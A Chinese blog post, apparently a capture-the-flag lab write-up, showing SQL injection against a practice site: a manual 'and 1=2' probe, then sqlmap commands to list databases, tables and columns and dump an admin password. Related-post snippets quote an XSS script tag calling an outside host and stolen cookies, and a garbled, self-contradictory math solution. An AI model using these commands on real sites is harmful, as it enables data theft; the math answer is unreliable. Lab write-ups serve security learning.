第一章:为了女神小芳

最新推荐文章于 2024-07-03 07:04:23 发布
最新推荐文章于 2024-07-03 07:04:23 发布
阅读量2.2k 收藏 2
点赞数 1
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59205095/article/details/124809100
版权

第一章:为了女神小芳

通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站
学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了

宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn)

实验工具 sqlmap

实验环境 kali

1.判断是否存在注入点,页面显示如图所示可能存在sql注入点

http://rhiq8003.ia.aqlab.cn/?id=1and%201=2

2.打开kail 自带的sqlmap工具

 

2.使用sqlmap看看能否获得数据库

sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 --dbs

 

 通过一段时间的等待,我们获得3个数据库的名字。结合题目我们对maoshe数据库进行探测

3.对maoshe数据库字段进行探测;

sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe --tables

 

通过sqlmap的努力我们得到4个表,其中有我们熟悉的 admin,所以对这个 表开始探测。

3.对admin表进行探测;

sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe -T admin --columns

 通过对这个表的探测我们得到三行,其中password应该是我们想要的flag

4.对passWord 进行探测

sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe -T admin -C password --dump

 最后我们得到了flag,至于flag是啥,自己去试试吧

 

沁一致
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2007
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
封神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3005
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
封神台----为了女神小芳
weixin_72543266的博客
09-12 358
Sqlmap我想大部分都很熟悉,但我也就只是听过并没有使用过这个工具,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞. 任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而Sqlmap就是自动工具中最好用的工具。那么直接进入主题。 本章是自己之前学习过SQL注入,但是没有使用过Sqlmap这个工具,在找到了一篇Sqlmap入门篇报告后,虽然对于SQL注入这方面的知识早已忘记,但基本原理还是清楚的,所以破不及待的来实现
封神台-第一章:为了女神小芳
qq_64409509的博客
06-02 97
封神台-第一章:为了女神小芳
封神台第一章:为了女神小芳
qq_51459600的博客
12-22 502
实验平台:封神台-掌控安全在线演练靶场 第一章:为了女神小芳! 传送门:http://rhiq8003.ia.aqlab.cn/ 实验目标:获取admin的密码 点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id   判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容,说明存在注入点   判断查询字段数 http://rhiq8003.ia.aqlab.cn/
注入(一)
tomyyyyy
06-28 275
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
封神台靶场 第一章:为了女神小芳!writeup
Sk1y的博客
02-15 2万+
封神台靶场 第一章:为了女神小芳! 题目简述: 封神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
北师大版一年级数学上册小芳的上午习题第2课时.pdf
10-14
北师大版一年级数学上册小芳的上午习题第2课时.pdf
小芳便利店JAVA源码
10-24
1.货物类(Goods):一个商品,包含了名称,价格信息 2.购物篮类(Basket):一个购物篮,包含了已经选择的东西 3. Store:小芳便利店 主程序 -static final Goods[] GOODS //所有商品 -static Basket basket //...
小芳便利店的JUNIT测试
11-19
小芳便利店的Goods类写的JUNIT测试代码。
北师小学数学一年级上册小芳上午PPT教案.pptx
10-03
北师小学数学一年级上册小芳上午PPT教案.pptx
北师小学数学一年级上册小芳上午学习课程.pptx
10-01
北师小学数学一年级上册小芳上午学习课程.pptx
封神台靶场 第一章:为了女神小芳SQL注入)
m0_65712192的博客
10-14 1637
封神台靶场 第一章:为了女神小芳SQL注入)
封神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1548
我们先来学习sql注入,
封神台——第一题:为了女神小芳
分享简单的安全技术
01-17 692
题目:获取数据库管理员密码 题目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
尤里的复仇Ⅰ 小芳
HNU凌风的博客
03-10 713
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步,判断是否存在sql注入漏洞 在网站后构造?id=1 and 1=1 ,然后回车 页面返回正常 再次构造 ?id=1 and 1=2 然后回车 这里页面返回异常,初步判断这里可能存在一个sql注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 or
LeetCode //SQL - 196. Delete Duplicate Emails
最新发布
Made in Code
07-03 941
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
基站A的监测距离为300,基站B的监测距离为500,基站c的监测距离为600,基站D的监测距离为288,如果A基站的坐标为(0,,0),B(200,;0),c(0,300),A,B.C,D四个基站形成一个矩形。求D基站的坐标。如果小明从(20,30)开始行走,·小芳从(30,,50)开始行走,小明的速度为每秒3m,小芳的速度为每秒5米;小明的移动方向为斜率为1的直线方向小芳的运动方向为斜率为0,5的直线方向。请问小明和小芳什么时候无法被任何一个基站定位。附加题:小明小芳何时无法被定位,小明小芳是否会相遇
06-02
首先,根据题意,可以得到以下四个基站的坐标: A(0,0) B(200,0) C(0,300) D(x,y) 由于四个基站形成一个矩形,因此D点的坐标必须满足以下两个条件: 1. D点到A点的距离为288,即√((x-0)^2 + (y-0)^2) = 288 2. D点到B点的距离为300,即√((x-200)^2 + (y-0)^2) = 300 解方程组: (x-0)^2 + (y-0)^2 = 288^2 (x-200)^2 + (y-0)^2 = 300^2 化简得: x^2 + y^2 = 82944 x^2 - 400x + y^2 = 70656 将第一个式子代入第二个式子,得到: -400x = -12288 解得: x = 30.72 将x代入第一个式子,得到: y = ±278.4 因为D点在矩形内部,所以y = -278.4,即D的坐标为(30.72,-278.4)。 接下来考虑小明和小芳的问题。小明的移动方向为斜率为1的直线方向,即小明的运动轨迹可以表示为y=x+常数;小芳的运动方向为斜率为0.5的直线方向,即小芳的运动轨迹可以表示为y=0.5x+常数。 设小明和小芳在t时间后相遇,即他们此时的位置相同,即: x_ming + 3t = x_fang + 5t y_ming + 3t = y_fang + 5t 将小明和小芳的运动轨迹带入上式,得到: x_ming + 3t = x_fang + 5t x_ming + 3t = 2y_ming + 常数1 x_fang + 5t = y_fang + 常数2 将常数1和常数2带入第一个式子,得到: x_ming + 3t = x_fang + 5t x_ming + 3t = 2y_ming + x_fang - 常数2 x_fang + 5t = 0.5x_fang + 常数1 化简得: x_ming - x_fang = 2y_ming - 常数2 - 3t 1.5x_fang - 5t = 常数1 综上所述,小明和小芳无法被任何一个基站定位的条件是:他们的位置不在任何一个基站的监测范围内。因此,我们只需要找到四个基站的监测范围,并判断他们在哪些区域内即可。 A基站的监测范围为以(0,0)为圆心,半径为300的圆形区域; B基站的监测范围为以(200,0)为圆心,半径为500的圆形区域; C基站的监测范围为以(0,300)为圆心,半径为600的圆形区域; D基站的监测范围为以(30.72,-278.4)为圆心,半径为288的圆形区域。 因此,我们只需要判断小明和小芳的位置是否在这四个圆形区域之外即可。如果小明和小芳的位置都在这四个圆形区域之外,则他们无法被任何一个基站定位。 附加题:小明和小芳无法被定位的条件是:他们的位置都在四个基站的监测范围之外。小明和小芳是否会相遇需要进一步计算。将上面的两个方程联立,得到: x_ming - x_fang = 2y_ming - 常数2 - 3t 1.5x_fang - 5t = 常数1 两个方程的系数矩阵为: [ 1 -1 -2 ] [ 0 1.5 5 ] [ 2 0 -3 ] * [-1 0 1 ] 解得: t = -1/7 x_ming = 370/7 y_ming = 178/7 x_fang = 415/7 y_fang = 207/14 因此,小明和小芳会在t = -1/7的时刻相遇,相遇地点的坐标为(x_ming,y_ming) = (370/7,178/7)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值